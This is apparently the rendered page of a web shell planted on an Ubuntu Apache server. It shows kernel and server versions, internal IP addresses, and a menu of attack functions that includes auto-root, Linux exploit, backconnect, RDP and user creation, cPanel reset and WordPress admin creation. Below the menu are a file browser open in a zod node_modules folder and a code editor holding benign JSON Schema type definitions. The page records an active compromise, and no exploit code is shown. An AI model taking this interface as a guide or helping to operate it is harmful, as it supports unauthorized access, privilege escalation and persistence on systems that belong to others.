Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
zod /
src /
v4 /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
api.ts
46.39
KB
-rw-r--r--
checks.ts
36.43
KB
-rw-r--r--
config.ts
472
B
-rw-r--r--
core.ts
4.64
KB
-rw-r--r--
doc.ts
1.16
KB
-rw-r--r--
errors.ts
12.85
KB
-rw-r--r--
function.ts
6.14
KB
-rw-r--r--
index.ts
499
B
-rw-r--r--
json-schema.ts
3.62
KB
-rw-r--r--
parse.ts
3.73
KB
-rw-r--r--
regexes.ts
6.79
KB
-rw-r--r--
registries.ts
2.78
KB
-rw-r--r--
schemas.ts
115.65
KB
-rw-r--r--
standard-schema.ts
2.27
KB
-rw-r--r--
to-json-schema.ts
31.66
KB
-rw-r--r--
util.ts
22.28
KB
-rw-r--r--
versions.ts
83
B
-rw-r--r--
zsf.ts
6.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : json-schema.ts
export type Schema = | ObjectSchema | ArraySchema | StringSchema | NumberSchema | IntegerSchema | BooleanSchema | NullSchema; // export type JsonType = "object" | "array" | "string" | "number" | "boolean" | "null" | "integer"; // export interface JSONSchema { // type?: string ; // $id?: string ; // id?: string ; // $schema?: string ; // $ref?: string ; // $anchor?: string ; // $defs?: { [key: string]: JSONSchema } ; // definitions?: { [key: string]: JSONSchema } ; // $comment?: string ; // title?: string ; // description?: string ; // default?: unknown ; // examples?: unknown[] ; // readOnly?: boolean ; // writeOnly?: boolean ; // deprecated?: boolean ; // allOf?: JSONSchema[] ; // anyOf?: JSONSchema[] ; // oneOf?: JSONSchema[] ; // not?: JSONSchema ; // if?: JSONSchema ; // then?: JSONSchema ; // else?: JSONSchema ; // enum?: Array<string | number | boolean | null> ; // const?: string | number | boolean | null ; // [k: string]: unknown; // /** A special key used as an intermediate representation of extends-style relationships. Omitted as a $ref with additional properties. */ // // _ref?: JSONSchema; // _prefault?: unknown ; // } export type _JSONSchema = boolean | JSONSchema; export type JSONSchema = { [k: string]: unknown; $schema?: "https://json-schema.org/draft/2020-12/schema" | "http://json-schema.org/draft-07/schema#"; $id?: string; $anchor?: string; $ref?: string; $dynamicRef?: string; $dynamicAnchor?: string; $vocabulary?: Record<string, boolean>; $comment?: string; $defs?: Record<string, JSONSchema>; type?: "object" | "array" | "string" | "number" | "boolean" | "null" | "integer"; additionalItems?: _JSONSchema; unevaluatedItems?: _JSONSchema; prefixItems?: _JSONSchema[]; items?: _JSONSchema | _JSONSchema[]; contains?: _JSONSchema; additionalProperties?: _JSONSchema; unevaluatedProperties?: _JSONSchema; properties?: Record<string, _JSONSchema>; patternProperties?: Record<string, _JSONSchema>; dependentSchemas?: Record<string, _JSONSchema>; propertyNames?: _JSONSchema; if?: _JSONSchema; then?: _JSONSchema; else?: _JSONSchema; allOf?: JSONSchema[]; anyOf?: JSONSchema[]; oneOf?: JSONSchema[]; not?: _JSONSchema; multipleOf?: number; maximum?: number; exclusiveMaximum?: number; minimum?: number; exclusiveMinimum?: number; maxLength?: number; minLength?: number; pattern?: string; maxItems?: number; minItems?: number; uniqueItems?: boolean; maxContains?: number; minContains?: number; maxProperties?: number; minProperties?: number; required?: string[]; dependentRequired?: Record<string, string[]>; enum?: Array<string | number | boolean | null>; const?: string | number | boolean | null; // metadata id?: string; title?: string; description?: string; default?: unknown; deprecated?: boolean; readOnly?: boolean; writeOnly?: boolean; examples?: unknown[]; format?: string; contentMediaType?: string; contentEncoding?: string; contentSchema?: JSONSchema; // internal _prefault?: unknown; }; // for backwards compatibility export type BaseSchema = JSONSchema; export interface ObjectSchema extends JSONSchema { type: "object"; } export interface ArraySchema extends JSONSchema { type: "array"; } export interface StringSchema extends JSONSchema { type: "string"; } export interface NumberSchema extends JSONSchema { type: "number"; } export interface IntegerSchema extends JSONSchema { type: "integer"; } export interface BooleanSchema extends JSONSchema { type: "boolean"; } export interface NullSchema extends JSONSchema { type: "null"; }
Close